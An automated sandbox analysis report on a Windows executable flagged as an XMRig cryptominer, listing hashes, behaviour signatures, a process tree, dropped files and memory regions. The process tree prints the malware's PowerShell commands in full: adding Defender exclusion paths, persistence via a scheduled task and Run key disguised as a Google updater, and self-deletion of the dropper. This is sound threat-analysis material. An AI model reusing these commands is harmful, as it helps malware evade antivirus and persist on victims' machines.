Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1804s
  • max time network
    1814s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3496
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\XJEzW6M7WvHaF3EX.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\XJEzW6M7WvHaF3EX.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2716
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1004
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3524
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1968
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:3288
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\XJEzW6M7WvHaF3EX.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1868
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:5008
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1676
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2100
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:4856
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:4504
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:3792
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:2488
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:3120
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4460

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Discovery

          System Information Discovery

          1
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            d28a889fd956d5cb3accfbaf1143eb6f

            SHA1

            157ba54b365341f8ff06707d996b3635da8446f7

            SHA256

            21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

            SHA512

            0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            2f1e06b3a62b9b1f23ece8e179e835b8

            SHA1

            3a7736546189a20d827d4a54b2186bb8378278a7

            SHA256

            09b53071e194bce7d7d11912526d53ed45200d62d692ca6225c6d7ae9e5de7d0

            SHA512

            401608db64cfef50728c8a1d2b7570b46b83251566c22a4ddae6cddd44964217fee47e096531a32eb123349107665f2ab1fa005f0e10cea6f21d85e6cc16977e

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y3dh5b1f.ocx.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/1004-1-0x000001E573290000-0x000001E5732B2000-memory.dmp
            Filesize

            136KB

          • memory/1004-12-0x000001E558B50000-0x000001E558B60000-memory.dmp
            Filesize

            64KB

          • memory/1004-17-0x00007FF9768C0000-0x00007FF977381000-memory.dmp
            Filesize

            10.8MB

          • memory/1004-14-0x000001E558B50000-0x000001E558B60000-memory.dmp
            Filesize

            64KB

          • memory/1004-13-0x000001E558B50000-0x000001E558B60000-memory.dmp
            Filesize

            64KB

          • memory/1004-11-0x00007FF9768C0000-0x00007FF977381000-memory.dmp
            Filesize

            10.8MB

          • memory/1676-88-0x000001B767950000-0x000001B76795A000-memory.dmp
            Filesize

            40KB

          • memory/1676-89-0x000001B77FEE0000-0x000001B77FEF0000-memory.dmp
            Filesize

            64KB

          • memory/1676-82-0x000001B7679A0000-0x000001B7679BC000-memory.dmp
            Filesize

            112KB

          • memory/1676-80-0x000001B702650000-0x000001B702705000-memory.dmp
            Filesize

            724KB

          • memory/1676-84-0x000001B767940000-0x000001B76794A000-memory.dmp
            Filesize

            40KB

          • memory/1676-87-0x000001B702860000-0x000001B702866000-memory.dmp
            Filesize

            24KB

          • memory/1676-81-0x000001B767930000-0x000001B76793A000-memory.dmp
            Filesize

            40KB

          • memory/1676-69-0x000001B77FEE0000-0x000001B77FEF0000-memory.dmp
            Filesize

            64KB

          • memory/1676-86-0x000001B702850000-0x000001B702858000-memory.dmp
            Filesize

            32KB

          • memory/1676-79-0x000001B702630000-0x000001B70264C000-memory.dmp
            Filesize

            112KB

          • memory/1676-92-0x00007FF9768C0000-0x00007FF977381000-memory.dmp
            Filesize

            10.8MB

          • memory/1676-85-0x000001B7679E0000-0x000001B7679FA000-memory.dmp
            Filesize

            104KB

          • memory/1676-57-0x00007FF9768C0000-0x00007FF977381000-memory.dmp
            Filesize

            10.8MB

          • memory/1676-58-0x000001B77FEE0000-0x000001B77FEF0000-memory.dmp
            Filesize

            64KB

          • memory/1676-59-0x000001B77FEE0000-0x000001B77FEF0000-memory.dmp
            Filesize

            64KB

          • memory/1968-40-0x0000015B77A00000-0x0000015B77A10000-memory.dmp
            Filesize

            64KB

          • memory/1968-54-0x00007FF9768C0000-0x00007FF977381000-memory.dmp
            Filesize

            10.8MB

          • memory/1968-52-0x0000015B77A00000-0x0000015B77A10000-memory.dmp
            Filesize

            64KB

          • memory/1968-47-0x0000015B77A00000-0x0000015B77A10000-memory.dmp
            Filesize

            64KB

          • memory/1968-39-0x00007FF9768C0000-0x00007FF977381000-memory.dmp
            Filesize

            10.8MB

          • memory/2100-96-0x0000029D6F560000-0x0000029D6F570000-memory.dmp
            Filesize

            64KB

          • memory/2100-107-0x0000029D6F560000-0x0000029D6F570000-memory.dmp
            Filesize

            64KB

          • memory/2100-123-0x00007FF9768C0000-0x00007FF977381000-memory.dmp
            Filesize

            10.8MB

          • memory/2100-121-0x0000029D6F560000-0x0000029D6F570000-memory.dmp
            Filesize

            64KB

          • memory/2100-120-0x0000029D6F560000-0x0000029D6F570000-memory.dmp
            Filesize

            64KB

          • memory/2100-118-0x0000029D71ED0000-0x0000029D71F85000-memory.dmp
            Filesize

            724KB

          • memory/2100-112-0x00007FF491C70000-0x00007FF491C80000-memory.dmp
            Filesize

            64KB

          • memory/2100-94-0x00007FF9768C0000-0x00007FF977381000-memory.dmp
            Filesize

            10.8MB

          • memory/2100-95-0x0000029D6F560000-0x0000029D6F570000-memory.dmp
            Filesize

            64KB

          • memory/2716-38-0x00007FF648B60000-0x00007FF648D71000-memory.dmp
            Filesize

            2.1MB

          • memory/2716-33-0x00007FF648B60000-0x00007FF648D71000-memory.dmp
            Filesize

            2.1MB

          • memory/2716-0-0x00007FF648B60000-0x00007FF648D71000-memory.dmp
            Filesize

            2.1MB

          • memory/3120-140-0x0000028099490000-0x00000280994B0000-memory.dmp
            Filesize

            128KB

          • memory/3120-147-0x0000028099490000-0x00000280994B0000-memory.dmp
            Filesize

            128KB

          • memory/3120-194-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-192-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-190-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-188-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-186-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-184-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-182-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-128-0x0000028088F40000-0x0000028088F60000-memory.dmp
            Filesize

            128KB

          • memory/3120-129-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-180-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-133-0x0000028099470000-0x0000028099490000-memory.dmp
            Filesize

            128KB

          • memory/3120-178-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-135-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-137-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-139-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-176-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-141-0x00000280994B0000-0x00000280994D0000-memory.dmp
            Filesize

            128KB

          • memory/3120-142-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-174-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-144-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-146-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-172-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-148-0x00000280994B0000-0x00000280994D0000-memory.dmp
            Filesize

            128KB

          • memory/3120-150-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-152-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-154-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-156-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-158-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-160-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-162-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-164-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-166-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-168-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3120-170-0x00007FF65A5B0000-0x00007FF65ADA4000-memory.dmp
            Filesize

            8.0MB

          • memory/3524-20-0x000001FCD6490000-0x000001FCD64A0000-memory.dmp
            Filesize

            64KB

          • memory/3524-19-0x00007FF9768C0000-0x00007FF977381000-memory.dmp
            Filesize

            10.8MB

          • memory/3524-36-0x00007FF9768C0000-0x00007FF977381000-memory.dmp
            Filesize

            10.8MB

          • memory/3524-34-0x000001FCD6490000-0x000001FCD64A0000-memory.dmp
            Filesize

            64KB

          • memory/3524-32-0x000001FCD6490000-0x000001FCD64A0000-memory.dmp
            Filesize

            64KB

          • memory/3524-21-0x000001FCD6490000-0x000001FCD64A0000-memory.dmp
            Filesize

            64KB

          • memory/3792-143-0x00007FF72CFC0000-0x00007FF72CFD6000-memory.dmp
            Filesize

            88KB

          • memory/3792-134-0x00007FF72CFC0000-0x00007FF72CFD6000-memory.dmp
            Filesize

            88KB

          • memory/4460-83-0x00007FF7FBF70000-0x00007FF7FC181000-memory.dmp
            Filesize

            2.1MB

          • memory/4460-127-0x00007FF7FBF70000-0x00007FF7FC181000-memory.dmp
            Filesize

            2.1MB

          • memory/4460-56-0x00007FF7FBF70000-0x00007FF7FC181000-memory.dmp
            Filesize

            2.1MB

          • memory/4460-119-0x00007FF7FBF70000-0x00007FF7FC181000-memory.dmp
            Filesize

            2.1MB